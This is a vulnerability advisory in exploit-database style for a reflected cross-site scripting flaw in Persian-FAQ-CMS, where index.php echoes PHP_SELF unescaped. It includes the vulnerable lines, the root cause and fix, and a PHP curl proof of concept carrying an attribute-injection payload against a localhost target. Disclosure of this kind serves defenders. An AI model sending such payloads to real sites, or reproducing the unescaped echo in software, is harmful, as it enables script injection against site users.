=====================================================
# Exploit Title: Persian-FAQ-CMS Cross-Site Scripting
# Exploit Author: Ashiyane Digital Security Team
# Vendor Homepage: http://www.dl.persianscript.ir/script/Persian-FAQ-CMS.zip
# Tested on: Windows 8, Kali Linux
# Date : 26 OCT 2016
=====================================================
# Vulnerable file(url) and code:
// Method : Post
// http://127.0.0.1/index.php
Line 3: $loginFormAction = $_SERVER['PHP_SELF'];
/******************************************/
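Line 70: echo $loginFormAction;
// Root cause: $_SERVER['PHP_SELF'] includes any path info the client appends after index.php, and line 70 echoes it without escaping (presumably into the login form's action attribute).
// Fix: output htmlspecialchars($loginFormAction, ENT_QUOTES, 'UTF-8'), or use a fixed action URL instead of PHP_SELF.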
/*****************************************/
# Exploit code:
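<?php
// Proof-of-concept request for the reflected XSS described above: index.php
// echoes $_SERVER['PHP_SELF'] unescaped, so path info appended after
// "index.php" comes back inside the returned HTML.
$target = "127.0.0.1/path";

// The path info carries a URL-encoded attribute break-out. The server decodes
// %22 to a double quote before filling PHP_SELF; a page that escapes its
// output would return it as &quot; instead.
$url = "http://$target/index.php/%22onmouseover%3d'alert(123)'bad%3d%22";

// $target can contain "/" (the default value does), which would make the
// cookie jar path point into a directory that does not exist. Map anything
// outside a conservative filename alphabet to "_" so the jar can be written.
$cookieJar = "/tmp/cookie_" . preg_replace('/[^A-Za-z0-9._-]/', '_', $target);

$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
// Give up quickly: 3 s overall, or when throughput stays under 3 bytes/s for 3 s.
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookieJar);

$buf = curl_exec($ch);
if ($buf === false) {
    // curl_exec() returns false on failure; report the reason instead of
    // silently printing nothing.
    $err = curl_error($ch);
    curl_close($ch);
    echo "Request failed: $err\n";
    exit(1);
}
curl_close($ch);
unset($ch);

// The response is printed exactly as received. From the CLI this is plain text
// to inspect for the unescaped attribute; served through a web server it is
// live HTML, so the reflected handler would be active in the viewing browser.
echo $buf;
?>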
================================================================================
# Discovered By : M.R.S.L.Y
================================================================================